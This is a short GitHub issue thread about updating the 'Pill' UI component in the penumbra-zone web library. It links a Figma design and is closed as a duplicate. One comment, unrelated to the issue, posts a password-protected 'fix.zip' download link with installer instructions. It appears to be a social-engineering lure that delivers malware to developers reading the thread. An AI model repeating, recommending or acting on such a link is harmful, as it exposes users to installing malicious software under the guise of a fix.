### ISSUE TITLE
Pill 2.1 update

### ISSUE THREAD

**Issue by grod220** [penumbra-zone/web#1745]
Updates: https://www.figma.com/design/WKgXSVVK3L0EI0sr9Hwjoa/penumbra-UI-library?node-id=237-15466&node-type=FRAME&cc-version-id=6488412680&m=dev

- Styles changed
- New variants

**Comment by wahyu-n** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VanishMax** [comment]
Duplicate of #1730
